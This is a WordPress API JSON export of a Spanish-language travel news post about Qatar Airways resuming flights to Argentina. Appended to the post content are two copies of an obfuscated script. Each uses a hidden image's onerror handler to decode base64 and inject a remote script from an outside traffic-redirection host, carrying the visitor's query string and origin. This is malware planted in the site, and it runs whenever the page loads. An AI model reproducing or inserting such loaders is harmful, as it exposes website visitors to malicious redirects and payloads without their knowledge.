{"id":2317,"date":"2023-03-08T12:02:57","date_gmt":"2023-03-08T15:02:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2317"},"modified":"2025-08-14T00:21:46","modified_gmt":"2025-08-14T03:21:46","slug":"qatar-airways-reanuda-sus-vuelos-a-la-argentina-en-diciembre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2317","title":{"rendered":"Qatar Airways reanuda sus vuelos a la argentina en diciembre"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#4f0f1f\"><em>El\u00a0<strong>CEO de Qatar Airways, Akbar Al Baker, anunci\u00f3 que la empresa volver\u00e1 a realizar vuelos hacia la Argentina desde el 8 de diciembre<\/strong>, en la conferencia de prensa en la que INPROTUR particip\u00f3 durante el primer d\u00eda de la Feria IBT Berl\u00edn, en Alemania.<\/em><\/h4>\n\n\n\n<p>La ruta argentina era uno de los 11 destinos que la empresa a\u00e9rea hab\u00eda suspendido por la pandemia. Sin dudas, esto es muy importante para la Argentina, ya que era una de las \u00faltimas l\u00edneas a\u00e9reas que faltaba regresar al pa\u00eds.<br>\u00a0<br>Tras la conferencia de prensa la delegaci\u00f3n nacional reuni\u00f3n con\u00a0<strong>Thierry Antinori, Chief Commercial Officer de Qatar Qirways<\/strong>, con quien se coordinaron acciones de promoci\u00f3n conjuntas que potencien la llegada de turistas extranjeros hacia nuestro pa\u00eds.\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci6.googleusercontent.com\/proxy\/BYWV1Za46HmHCPgDvy51fpBZ08jGlSt-xXskkvOSnUu5_g3VJNz25s4sOg0L-8qauZ8ZCqg4fCZn37mw6wWTZn7I7Gc4x-Pwm7UU2N-80_XFZFZT4VnQMxlVkovQ7UMW3X-iK0NHBlhrEZ1mkHiiOQPrIe922A=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/2a75a6f7-38db-04e0-e892-3f0188d4c489.png\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El\u00a0CEO de Qatar Airways, Akbar Al Baker, anunci\u00f3 que la empresa volver\u00e1 a realizar vuelos hacia la Argentina desde el 8 de diciembre, en la conferencia de prensa en la que INPROTUR particip\u00f3 durante el primer d\u00eda de la Feria IBT Berl\u00edn, en Alemania. La ruta argentina era uno de los 11 destinos que la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2318,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,18],"tags":[],"class_list":{"0":"post-2317","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2317"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2317"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2317\/revisions"}],"predecessor-version":[{"id":7154,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2317\/revisions\/7154"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2318"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}